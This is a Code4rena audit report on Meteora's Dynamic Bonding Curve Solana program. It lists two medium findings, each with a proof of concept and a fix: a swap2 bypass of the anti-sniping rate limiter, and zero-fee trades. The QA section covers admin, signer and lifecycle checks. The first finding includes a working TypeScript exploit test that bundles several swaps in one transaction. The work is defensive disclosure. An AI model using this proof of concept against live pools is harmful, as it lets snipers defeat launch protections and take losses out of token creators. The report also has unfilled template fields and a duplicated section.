Meteora - Dynamic Bonding Curve
Findings & Analysis Report
2025-11-04
Table of contents
Overview
About C4
Code4rena (C4) is a competitive audit platform where security researchers, referred to as Wardens, review, audit, and analyze codebases for security vulnerabilities in exchange for bounties provided by sponsoring projects.
A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the Meteora - Dynamic Bonding Curve smart contract system. The audit took place from August 22 to September 12, 2025.
Final report assembled by Code4rena.
Summary
The C4 analysis yielded an aggregated total of 2 unique vulnerabilities. Of these vulnerabilities, 0 received a risk rating in the category of HIGH severity and 2 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 13 reports detailing issues with a risk rating of LOW severity or non-critical.
All of the issues presented here are linked back to their original finding, which may include relevant context from the judge and Meteora team.
Scope
The code under review can be found within the C4 Meteora - Dynamic Bonding Curve repository, and is composed of {{numContracts}} smart contracts written in the Solidity programming language and includes {{solLoc}} lines of Solidity code.
Severity Criteria
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
Medium Risk Findings (2)
[F-50] Swap rate limiter bypass vulnerability via swap2 instruction
Submitted by faculty1, also found by maxzuvex
It is possible to bypass the feeRateLimiter mode, in particular the swap rate limiter (an anti-sniping feature - which prevents snipers from bundling multiple swap instructions in one transaction) by using the swap2 instruction handler. The vulnerability arises from the lack of a swap2 discriminator check in the function validate_single_swap_instruction().
pub fn validate_single_swap_instruction() {
...
if instruction.program_id != crate::ID {
// we treat any instruction including that pool address is other swap ix
for i in 0..instruction.accounts.len() {
if instruction.accounts[i].pubkey.eq(pool) {
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
} else if instruction.data[..8].eq(SwapInstruction::DISCRIMINATOR) {
if instruction.accounts[2].pubkey.eq(pool) {
// otherwise, we just need to search swap instruction discriminator,
// so creator can still bundle initialzing pool and swap at 1 tx
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
}
The root cause is represented by the code extract above; It only checks whether the instructions discriminator matches with the SwapInstruction's discriminator, however the SwapInstruction::DISCRIMINATOR only represents the swap instruction discriminator, thus the condition does not account for a swap2 instruction discriminator, leading to the present vulnerability whereby a sniper can instead use the swap2 instruction to bypass the swap rate limiter restrictions.
Impact
The lack of a swap2 instruction discriminator check enables a sniper to bypass the swap rate limiter restrictions (1 swap ix per tx) and bundle as many as 16 (from the code comments) swap instructions in a single transaction. This is critical as partners advertising a sniper-resistant launch will fail short of that promise, while creators expecting a sniper-resistant launch might suffer losses from snipers acquiring a large potion of the token supply directly after launch.
Proof of Concept
Proof of Concept
The proof of concept provided proves the validity of the vulnerability by successfully executing a single transaction with 3 swap instructions using the swap2 instruction with feeRateLimiter enabled as the baseFeeMode.
The following are the steps required to run the PoC:
- Create a file
swap_rate_limiter_bypass_poc.test.tsin thetestsdirectory. - Add the code provided below into the newly created file.
- In the
package.jsonfile add a new script command:"swap-rate-limiter-bypass-poc": "anchor build -p dynamic_bonding_curve -- --features local && yarn run ts-mocha --runInBand -p ./tsconfig.json -t 1000000 tests/swap_rate_limiter_bypass_poc.test.ts", - To run the test, execute
npm run swap-rate-limiter-bypass-pocin the terminal. - The test succeeds and provides a transaction log proving 3 swap instructions were successfully executed in a single transaction, therefore bypassing the swap rate limiter restriction which limits it to only 1 swap instruction in a single transaction.
swap_rate_limiter_bypass_poc.test.ts
import { BanksClient, ProgramTestContext } from "solana-bankrun";
import {
createConfig,
CreateConfigParams,
createPoolWithSplToken,
SwapParams2,
} from "./instructions";
import { VirtualCurveProgram } from "./utils/types";
import {
Keypair,
PublicKey,
SYSVAR_INSTRUCTIONS_PUBKEY,
Transaction,
TransactionInstruction,
} from "@solana/web3.js";
import {
derivePoolAuthority,
designCurve,
fundSol,
getOrCreateAssociatedTokenAccount,
getTokenAccount,
processTransactionMaybeThrow,
startTest,
U64_MAX,
unwrapSOLInstruction,
wrapSOLInstruction,
} from "./utils";
import { createVirtualCurveProgram } from "./utils";
import { getConfig, getVirtualPool } from "./utils/fetcher";
import { createToken, mintSplTokenTo } from "./utils/token";
import { expect } from "chai";
import { BN } from "bn.js";
import {
getAssociatedTokenAddressSync,
NATIVE_MINT,
TOKEN_2022_PROGRAM_ID,
TOKEN_PROGRAM_ID,
unpackAccount,
} from "@solana/spl-token";
async function swap2(
banksClient: BanksClient,
program: VirtualCurveProgram,
params: SwapParams2
): Promise<{
pool: PublicKey;
computeUnitsConsumed: number;
message: any;
numInstructions: number;
completed: boolean;
}> {
const {
config,
payer,
pool,
inputTokenMint,
outputTokenMint,
amount0: amountIn,
amount1: minimumAmountOut,
referralTokenAccount,
swapMode,
} = params;
const poolAuthority = derivePoolAuthority();
let poolState = await getVirtualPool(banksClient, program, pool);
const configState = await getConfig(banksClient, program, config);
const tokenBaseProgram =
configState.tokenType == 0 ? TOKEN_PROGRAM_ID : TOKEN_2022_PROGRAM_ID;
const isInputBaseMint = inputTokenMint.equals(poolState.baseMint);
const quoteMint = isInputBaseMint ? outputTokenMint : inputTokenMint;
const [inputTokenProgram, outputTokenProgram] = isInputBaseMint
? [tokenBaseProgram, TOKEN_PROGRAM_ID]
: [TOKEN_PROGRAM_ID, tokenBaseProgram];
const preInstructions: TransactionInstruction[] = [];
const postInstructions: TransactionInstruction[] = [];
const preUserQuoteTokenBalance = 0;
const preBaseVaultBalance = (
await getTokenAccount(banksClient, poolState.baseVault)
).amount;
const [
{ ata: inputTokenAccount, ix: createInputTokenXIx },
{ ata: outputTokenAccount, ix: createOutputTokenYIx },
] = await Promise.all([
getOrCreateAssociatedTokenAccount(
banksClient,
payer,
inputTokenMint,
payer.publicKey,
inputTokenProgram
),
getOrCreateAssociatedTokenAccount(
banksClient,
payer,
outputTokenMint,
payer.publicKey,
outputTokenProgram
),
]);
createInputTokenXIx && preInstructions.push(createInputTokenXIx);
createOutputTokenYIx && preInstructions.push(createOutputTokenYIx);
if (inputTokenMint.equals(NATIVE_MINT) && !amountIn.isZero()) {
const wrapSOLIx = wrapSOLInstruction(
payer.publicKey,
inputTokenAccount,
BigInt(amountIn.toString())
);
preInstructions.push(...wrapSOLIx);
}
if (outputTokenMint.equals(NATIVE_MINT)) {
const unrapSOLIx = unwrapSOLInstruction(payer.publicKey);
unrapSOLIx && postInstructions.push(unrapSOLIx);
}
const swapIx1 = await program.methods
.swap2({
amount0: amountIn,
amount1: minimumAmountOut,
swapMode,
})
.accountsPartial({
poolAuthority,
config,
pool,
inputTokenAccount,
outputTokenAccount,
baseVault: poolState.baseVault,
quoteVault: poolState.quoteVault,
baseMint: poolState.baseMint,
quoteMint,
payer: payer.publicKey,
tokenBaseProgram,
tokenQuoteProgram: TOKEN_PROGRAM_ID,
referralTokenAccount,
})
.remainingAccounts([
{
pubkey: SYSVAR_INSTRUCTIONS_PUBKEY,
isSigner: false,
isWritable: false,
},
])
.instruction();
const swapIx2 = await program.methods
.swap2({
amount0: amountIn,
amount1: minimumAmountOut,
swapMode,
})
.accountsPartial({
poolAuthority,
config,
pool,
inputTokenAccount,
outputTokenAccount,
baseVault: poolState.baseVault,
quoteVault: poolState.quoteVault,
baseMint: poolState.baseMint,
quoteMint,
payer: payer.publicKey,
tokenBaseProgram,
tokenQuoteProgram: TOKEN_PROGRAM_ID,
referralTokenAccount,
})
.remainingAccounts([
{
pubkey: SYSVAR_INSTRUCTIONS_PUBKEY,
isSigner: false,
isWritable: false,
},
])
.instruction();
const swapIx3 = await program.methods
.swap2({
amount0: amountIn,
amount1: minimumAmountOut,
swapMode,
})
.accountsPartial({
poolAuthority,
config,
pool,
inputTokenAccount,
outputTokenAccount,
baseVault: poolState.baseVault,
quoteVault: poolState.quoteVault,
baseMint: poolState.baseMint,
quoteMint,
payer: payer.publicKey,
tokenBaseProgram,
tokenQuoteProgram: TOKEN_PROGRAM_ID,
referralTokenAccount,
})
.remainingAccounts([
{
pubkey: SYSVAR_INSTRUCTIONS_PUBKEY,
isSigner: false,
isWritable: false,
},
])
.instruction();
// @audit creates a transaction with three swap instructions
let ixs = [
...preInstructions,
swapIx1,
swapIx2,
swapIx3,
...postInstructions,
];
let transaction = new Transaction().add(...ixs);
transaction.recentBlockhash = (await banksClient.getLatestBlockhash())[0];
transaction.sign(payer);
let simu = await banksClient.simulateTransaction(transaction);
console.log("simulation logMessages: ", simu.meta.logMessages);
const consumedCUSwap = Number(simu.meta.computeUnitsConsumed);
await processTransactionMaybeThrow(banksClient, transaction);
poolState = await getVirtualPool(banksClient, program, pool);
const configs = await getConfig(banksClient, program, config);
return {
pool,
computeUnitsConsumed: consumedCUSwap,
message: simu.meta.logMessages,
numInstructions: transaction.instructions.length,
completed:
Number(poolState.quoteReserve) >= Number(configs.migrationQuoteThreshold),
};
}
describe("Swap V2", () => {
let context: ProgramTestContext;
let admin: Keypair;
let operator: Keypair;
let partner: Keypair;
let user: Keypair;
let poolCreator: Keypair;
let program: VirtualCurveProgram;
before(async () => {
context = await startTest();
admin = context.payer;
operator = Keypair.generate();
partner = Keypair.generate();
user = Keypair.generate();
poolCreator = Keypair.generate();
const receivers = [
operator.publicKey,
partner.publicKey,
user.publicKey,
poolCreator.publicKey,
];
await fundSol(context.banksClient, admin, receivers);
program = createVirtualCurveProgram();
});
it("Bypasses swap rate limiter", async () => {
let totalTokenSupply = 1_000_000_000; // 1 billion
let percentageSupplyOnMigration = 10; // 10%;
let migrationQuoteThreshold = 300; // 300 sol
let tokenBaseDecimal = 6;
let tokenQuoteDecimal = 9;
let migrationOption = 0; // damm v1
let lockedVesting = {
amountPerPeriod: new BN(0),
cliffDurationFromMigrationTime: new BN(0),
frequency: new BN(0),
numberOfPeriod: new BN(0),
cliffUnlockAmount: new BN(0),
};
let collectFeeMode = 0;
let quoteMint = await createToken(
context.banksClient,
admin,
admin.publicKey,
tokenQuoteDecimal
);
const feeIncrementBps = 100;
const maxLimiterDuration = 86400;
const referenceAmount = 1_000_000;
let instructionParams = designCurve(
totalTokenSupply,
percentageSupplyOnMigration,
migrationQuoteThreshold,
migrationOption,
tokenBaseDecimal,
tokenQuoteDecimal,
0,
collectFeeMode,
lockedVesting,
{
baseFeeOption: {
cliffFeeNumerator: new BN(2_500_000),
firstFactor: feeIncrementBps,
secondFactor: new BN(maxLimiterDuration),
thirdFactor: new BN(referenceAmount),
baseFeeMode: 2, // Rate limiter
},
}
);
const params: CreateConfigParams = {
payer: partner,
leftoverReceiver: partner.publicKey,
feeClaimer: partner.publicKey,
quoteMint,
instructionParams,
};
let config = await createConfig(context.banksClient, program, params);
let swapAmount = instructionParams.migrationQuoteThreshold
.mul(new BN(10))
.div(new BN(100));
await mintSplTokenTo(
context.banksClient,
user,
quoteMint,
admin,
user.publicKey,
swapAmount.toNumber() * 3 // To accomodate the 3 swap ixs
);
// create pool
let virtualPool = await createPoolWithSplToken(
context.banksClient,
program,
{
poolCreator,
payer: operator,
quoteMint,
config,
instructionParams: {
name: "test token spl",
symbol: "TEST",
uri: "abc.com",
},
}
);
let virtualPoolState = await getVirtualPool(
context.banksClient,
program,
virtualPool
);
// swap
const preVaultBalance =
(await getTokenAccount(context.banksClient, virtualPoolState.quoteVault))
.amount ?? 0;
const swapParams: SwapParams2 = {
config,
payer: user,
pool: virtualPool,
inputTokenMint: quoteMint,
outputTokenMint: virtualPoolState.baseMint,
amount0: swapAmount,
amount1: new BN(0),
referralTokenAccount: null,
swapMode: 0, //exact in
};
let swapResult = await swap2(context.banksClient, program, swapParams);
console.log("Swap tx program logs: ", swapResult.message);
});
});
Recommended Mitigation Steps
To fix this vulnerability, it is recommended to add a check for a swap2 instruction discriminator while checking the instruction data discriminator.
Recommended fix:
use crate::instruction::{Swap as SwapInstruction, Swap2};
pub fn validate_single_swap_instruction<'c, 'info>(
pool: &Pubkey,
remaining_accounts: &'c [AccountInfo<'info>],
) -> Result<()> {
let instruction_sysvar_account_info = remaining_accounts
.get(0)
.ok_or_else(|| PoolError::FailToValidateSingleSwapInstruction)?;
// get current index of instruction
let current_index =
sysvar::instructions::load_current_index_checked(instruction_sysvar_account_info)?;
let current_instruction = sysvar::instructions::load_instruction_at_checked(
current_index.into(),
instruction_sysvar_account_info,
)?;
if current_instruction.program_id != crate::ID {
// check if current instruction is CPI
// disable any stack height greater than 2
if get_stack_height() > 2 {
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
// check for any sibling instruction
let mut sibling_index = 0;
while let Some(sibling_instruction) = get_processed_sibling_instruction(sibling_index) {
if sibling_instruction.program_id == crate::ID
&& sibling_instruction.data[..8].eq(SwapInstruction::DISCRIMINATOR)
{
if sibling_instruction.accounts[2].pubkey.eq(pool) {
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
sibling_index = sibling_index.safe_add(1)?;
}
}
if current_index == 0 {
// skip for first instruction
return Ok(());
}
for i in 0..current_index {
let instruction = sysvar::instructions::load_instruction_at_checked(
i.into(),
instruction_sysvar_account_info,
)?;
if instruction.program_id != crate::ID {
// we treat any instruction including that pool address is other swap ix
for i in 0..instruction.accounts.len() {
if instruction.accounts[i].pubkey.eq(pool) {
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
}
// @audit Fix: Adds Swap2::DISCRIMINATOR check to also restrict swap2 instruction
else if instruction.data[..8].eq(SwapInstruction::DISCRIMINATOR)
|| instruction.data[..8].eq(Swap2::DISCRIMINATOR)
{
if instruction.accounts[2].pubkey.eq(pool) {
// otherwise, we just need to search swap instruction discriminator,
// so creator can still bundle initialzing pool and swap at 1 tx
msg!("Multiple swaps not allowed");
return Err(PoolError::FailToValidateSingleSwapInstruction.into());
}
}
}
Ok(())
}
[F-118] Zero free trades are possible under certain conditions
Submitted by Matte, also found by Sid_Sisodia
Description
FeeRateLimiter contains a vulnerability that allows zero-fee trades under specific conditions, violating the protocol’s documented requirement of a minimum 0.01% base fee. According to the DBC Documentation’s Trading Fees Calculation section, the “Fixed Base Fee can range from 0.01% to 99%”, and the “Rate Limiter is a fee slope mechanism that starts at a fixed base fee and increases the fee depending on the buy amount. The fee after the rate limiter is finished will be the fixed base fee of the pool.” This explicitly states that even rate-limiter pools must maintain a valid, non-zero base fee within the specified range.
Root Cause: The vulnerability stems from a validation bypass in the validate() method at lines 294-296, which contains an early return for zero rate limiters that skips ALL validation checks:
if self.is_zero_rate_limiter() {
return Ok(()); // VULNERABILITY: Bypasses minimum fee validation
}
The flaw is that is_zero_rate_limiter() only checks three parameters (reference_amount, max_limiter_duration, fee_increment_bps) but completely ignores cliff_fee_numerator:
fn is_zero_rate_limiter(&self) -> bool {
self.reference_amount == 0 &&
self.max_limiter_duration == 0 &&
self.fee_increment_bps == 0
// Does NOT check cliff_fee_numerator!
}
This allows a configuration with cliff_fee_numerator = 0 to pass validation despite violating the minimum fee requirement (MIN_FEE_NUMERATOR = 100_000 or 0.01%).
Subsequently, when is_rate_limiter_applied() returns false (which occurs for Base→Quote trades or when the rate limiter duration has expired), the fee calculation methods fall back to returning cliff_fee_numerator directly:
if self.is_rate_limiter_applied(...) {
// Dynamic fee logic
} else {
Ok(self.cliff_fee_numerator) // Returns 0 for misconfigured pools
}
For zero rate limiters where cliff_fee_numerator is zero, this results in completely free trades with zero effective fees, despite the protocol’s expectation of a minimum fee defined by MIN_FEE_NUMERATOR.
Recommendation
if self.is_zero_rate_limiter() {
+ require!(
+ self.cliff_fee_numerator >= MIN_FEE_NUMERATOR,
+ PoolError::InvalidFeeRateLimiter
+ );
return Ok(());
}
Proof of Concept
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_zero_fee_rate_limiter_allows_free_trades() {
// Create a zero rate limiter with zero cliff fee (misconfigured)
let rl = FeeRateLimiter {
reference_amount: 0,
max_limiter_duration: 0,
fee_increment_bps: 0,
cliff_fee_numerator: 0, // Zero fee - violates MIN_FEE_NUMERATOR requirement
};
// Validate passes despite zero fee configuration
assert!(rl.validate(
CollectFeeMode::QuoteToken as u8,
ActivationType::Slot
).is_ok(), "Zero rate limiter incorrectly passes validation!");
// When rate limiter is not applied (BaseToQuote or expired),
// fee resolves to cliff_fee_numerator which is zero
let fee = rl.get_base_fee_numerator_from_included_fee_amount(
1000, // current_point
100, // activation_point
TradeDirection::BaseToQuote,
1_000_000 // 1M tokens trade amount
).unwrap();
assert_eq!(fee, 0, "Free trades enabled - zero fee applied!");
// This violates protocol requirement: "Fixed Base Fee can range from 0.01% to 99%"
// Expected: fee >= MIN_FEE_NUMERATOR (1 bps = 0.01%)
// Actual: fee = 0
}
}
Low Risk and Non-Critical Issues
For this audit, 13 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by Almanax received the top score from the judge.
The following wardens also submitted reports: 0x1h3r, 0xAura, 0xozovehe, abh01, faculty1, Fulum, ghufran, Nnbugs22, rare_one, Sid_Sisodia, sjweb3, and won.
QA Report — Meteora Dynamic Bonding Curve
- Commit: 30dd2a1fc5c90949e2038f61c19dc03fee513d98
- Scope: programs/dynamic-bonding-curve/**
- Warden: almanax-1
L-01: Admin bypass risk when local feature is enabled
Location(s): programs/dynamic-bonding-curve/src/instructions/admin/auth.rs
Impact (why this matters): If the local feature is accidentally shipped, any caller will pass admin checks, compromising admin-only functions.
Description (root cause): assert_eq_admin returns true under #[cfg(feature = "local")].
#[cfg(feature = "local")]
pub fn assert_eq_admin(_admin: Pubkey) -> bool {
true
}
Remediation: Replace with a dev-only panic or guard via debug_assertions; ensure CI forbids building releases with --features local.
// Minimal Patch
#[cfg(feature = "local")]
pub fn assert_eq_admin(_admin: Pubkey) -> bool {
- true
+ // Only for local testing; never bypass in runtime
+ panic!("admin bypass is disabled in local builds");
}
// Example CI guard (GitHub Actions)
## - run: |
## if [[ "$GITHUB_REF" == refs/tags/* ]] && grep -R "features.*local" Cargo.toml; then
## echo "Local feature must not be enabled in release" && exit 1; fi
L-02: Missing lifecycle check (is_migrated == 0) before metadata init
Location(s): programs/dynamic-bonding-curve/src/instructions/migration/dynamic_amm_v2/migration_damm_v2_create_metadata.rs
Impact (why this matters): Prevents initializing migration metadata after a pool has already migrated, tightening the state machine and avoiding inconsistencies.
Description (root cause): Handler does not verify migration status before load_init().
// Evidence
pub fn handle_migration_damm_v2_create_metadata(
ctx: Context<MigrationDammV2CreateMetadataCtx>,
) -> Result<()> {
let config = ctx.accounts.config.load()?;
// Missing: check virtual_pool.is_migrated == 0
let mut migration_metadata = ctx.accounts.migration_metadata.load_init()?;
migration_metadata.virtual_pool = ctx.accounts.virtual_pool.key();
migration_metadata.partner = config.fee_claimer;
Ok(())
}
Remediation: Insert migration gate before initializing metadata (use an existing error like NotPermitToDoThisAction, or introduce a dedicated AlreadyMigrated).
pub fn handle_migration_damm_v2_create_metadata(
ctx: Context<MigrationDammV2CreateMetadataCtx>,
) -> Result<()> {
let config = ctx.accounts.config.load()?;
let migration_option = MigrationOption::try_from(config.migration_option)
.map_err(|_| PoolError::InvalidMigrationOption)?;
require!(migration_option == MigrationOption::DammV2, PoolError::InvalidMigrationOption);
+ let vp = ctx.accounts.virtual_pool.load()?;
+ require!(vp.is_migrated == 0, PoolError::NotPermitToDoThisAction);
let mut migration_metadata = ctx.accounts.migration_metadata.load_init()?;
migration_metadata.virtual_pool = ctx.accounts.virtual_pool.key();
migration_metadata.partner = config.fee_claimer;
Ok(())
}
L-03: Duplicate error message text (Invalid activation type)
Location(s): programs/dynamic-bonding-curve/src/error.rs
Impact (why this matters): Confusing diagnostics during troubleshooting.
Evidence:
// 29:31:programs/dynamic-bonding-curve/src/error.rs
#[msg("Invalid activation type")]
InvalidActivationType,
// 56:58:programs/dynamic-bonding-curve/src/error.rs
#[msg("Invalid activation type")]
InvalidTokenDecimals,
Remediation: Update the second message to Invalid token decimals.
L-04: Magic numbers in variable-fee scaling without named constants/docs
Location(s): programs/dynamic-bonding-curve/src/state/config.rs
Impact (why this matters): Reduces auditability and risks subtle mistakes.
Evidence:
// 314:320:programs/dynamic-bonding-curve/src/state/config.rs
let v_fee = square_vfa_bin.safe_mul(self.variable_fee_control.into())?;
// 3. Scaling down the result to fit within u64 range (dividing by 1e11 and rounding up)
let scaled_v_fee = v_fee.safe_add(99_999_999_999)?.safe_div(100_000_000_000)?;
Remediation: Extract ROUNDING_OFFSET and SCALE_DENOMINATOR as constants with doc comments referencing the derivation; add unit tests around boundary values.
L-05: Inconsistent error handling (unwrap()/expect()) in on-chain code
Location(s): programs/dynamic-bonding-curve/src/state/virtual_pool.rs (and others)
Impact (why this matters): Panics abort transactions and complicate error semantics.
Evidence:
// 345:349:programs/dynamic-bonding-curve/src/state/virtual_pool.rs
total_amount_in = total_amount_in.safe_add(in_amount)?;
current_sqrt_price = next_sqrt_price;
amount_left = amount_left.safe_sub(max_amount_out.try_into().unwrap())?;
Similar unwrap() usage appears in swap helper paths.
Remediation: Remove unwrap()/expect() from program code paths; return typed errors instead. Keep unwrap() only in off-chain tests.
L-06: Token2022 extension allowlist is strict—document and test
Location(s): programs/dynamic-bonding-curve/src/utils/token.rs
Impact (why this matters): Current policy denies any non-allowlisted extensions; that’s safer by default, but should be documented to avoid integration surprises.
Evidence: Only MetadataPointer and TokenMetadata are permitted; others return Ok(false).
Remediation: Document the allowlist in README and add tests that ensure rejection for other extensions remains enforced.
L-07: Missing signer check for creator/partner in Meteora DAMM LP lock/claim
Location(s):
programs/dynamic-bonding-curve/src/instructions/migration/meteora_damm/meteora_damm_lock_lp_token.rs-
programs/dynamic-bonding-curve/src/instructions/migration/meteora_damm/meteora_damm_claim_lp_token.rsImpact (why this matters): Any payer can trigger creator/partner lock/claim flows without an owner signature. While assets still go to the rightful owner, unauthorized state flips (lock/claim flags) can be griefing vectors and may affect downstream expectations. Description (root cause): Theowneraccount is anUncheckedAccountand is not required to be a signer. For claim, a genericsender: Signeris accepted but isn’t required to equalowner. Evidence:// meteora_damm_lock_lp_token.rs /// CHECK: owner pub owner: UncheckedAccount<'info>,
// In handler: only equality checks, no signature binding let ispartner = ctx.accounts.owner.key() == migrationmetadata.partner; let iscreator = ctx.accounts.owner.key() == virtualpool.creator;
```rust
// meteora_damm_claim_lp_token.rs
/// CHECK: owner of lp token, must be creator or partner
pub owner: UncheckedAccount<'info>,
/// CHECK: signer
pub sender: Signer<'info>,
// No require!(sender == owner)
Remediation: Require an owner signature or bind sender to owner.
// meteora_damm_lock_lp_token.rs
- /// CHECK: owner
- pub owner: UncheckedAccount<'info>,
+ pub owner: Signer<'info>,
// meteora_damm_claim_lp_token.rs
pub owner: UncheckedAccount<'info>,
pub sender: Signer<'info>,
+ // ensure the signer is the declared owner
+ #[inline]
+ fn assert_owner(sender: &Signer, owner: &UncheckedAccount) -> Result<()> {
+ require!(sender.key() == owner.key(), PoolError::InvalidOwnerAccount);
+ Ok(())
+ }
// call early in handler
+ assert_owner(&ctx.accounts.sender, &ctx.accounts.owner)?;
L-08: Overbroad error reuse reduces diagnosability
Location(s): Reuse of generic errors like NotPermitToDoThisAction (see L-02 remediation and similar flows).
Impact (why this matters): Incident response and UX suffer when distinct violations (e.g., already migrated vs. unauthorized actor vs. invalid owner) map to the same error, obscuring root cause and complicating monitoring.
Remediation: Introduce specific errors (e.g., AlreadyMigrated, Unauthorized, reuse InvalidOwnerAccount), and replace the generic catch-all across affected paths (migration metadata init, LP lock/claim, etc.). Keep InvalidOwnerAccount from L-07 and add AlreadyMigrated for L-02.
Governance / Centralization Findings
C-01: Permissionless metadata creation allows third-party timing control
Location(s): programs/dynamic-bonding-curve/src/instructions/migration/dynamic_amm_v2/migration_damm_v2_create_metadata.rs
Centralized Power / Trust Assumption: Anyone can initialize the migration metadata PDA as long as they pay rent; there is no creator/admin binding in the accounts. This allows third parties to front‑run initialization and control timing.
Risk Rationale: Although fields are set deterministically from config, control over creation timing and rent payer is externalized, which can be undesirable in governed flows and can complicate operational guarantees (monitoring, sequencing).
Recommended Controls: Add an account constraint tying virtual_pool.creator (or config.fee_claimer) to the caller (e.g., constraint = virtual_pool.load()?.creator == payer.key() @ PoolError::Unauthorized), or explicitly document that permissionless creation is intended.
Evidence:
#[derive(Accounts)]
pub struct MigrationDammV2CreateMetadataCtx<'info> {
#[account(has_one=config)]
pub virtual_pool: AccountLoader<'info, VirtualPool>,
pub config: AccountLoader<'info, PoolConfig>,
#[account(init, payer = payer, seeds = [DAMM_V2_METADATA_PREFIX.as_ref(), virtual_pool.key().as_ref()], bump, space = 8 + MeteoraDammV2Metadata::INIT_SPACE)]
pub migration_metadata: AccountLoader<'info, MeteoraDammV2Metadata>,
#[account(mut)]
pub payer: Signer<'info>,
}
Patch (Anchor constraint example):
#[derive(Accounts)]
pub struct MigrationDammV2CreateMetadataCtx<'info> {
#[account(
has_one = config,
+ constraint = virtual_pool.load()?.creator == payer.key() @ PoolError::Unauthorized,
)]
pub virtual_pool: AccountLoader<'info, VirtualPool>,
// ...
}
Also applies to Meteora DAMM metadata creation (programs/dynamic-bonding-curve/src/instructions/migration/meteora_damm/migration_meteora_damm_create_metadata.rs), which follows the same permissionless init pattern.
C-02: Hard-coded admin keys; no multisig/timelock enforcement
Location(s): programs/dynamic-bonding-curve/src/instructions/admin/auth.rs (the ADMINS array / assert_eq_admin)
Centralized Power / Trust Assumption: Upgrades or privileged operations rely on single keys; operational mistakes or key compromise have full blast radius.
Risk Rationale: Fixed admin set increases key-management risk and limits operational flexibility (no rotation/timelock by default).
Recommended Controls: Gate admin ops behind a governance PDA (e.g., SPL-Governance) or a program-verified multisig; or, at minimum, document the trust model and enforce a timelock / 2-of-3 policy operationally.
L-08: Overbroad error reuse reduces diagnosability
Location(s): Reuse of generic errors like NotPermitToDoThisAction (see L-02 remediation and similar flows).
Impact (why this matters): Incident response and UX suffer when distinct violations (e.g., already migrated vs. unauthorized actor vs. invalid owner) map to the same error, obscuring root cause and complicating monitoring.
Remediation: Introduce specific errors (e.g., AlreadyMigrated, Unauthorized, reuse InvalidOwnerAccount), and replace the generic catch-all across affected paths (migration metadata init, LP lock/claim, etc.). Keep InvalidOwnerAccount from L-07 and add AlreadyMigrated for L-02.
Disclosures
C4 is an open organization governed by participants in the community.
C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.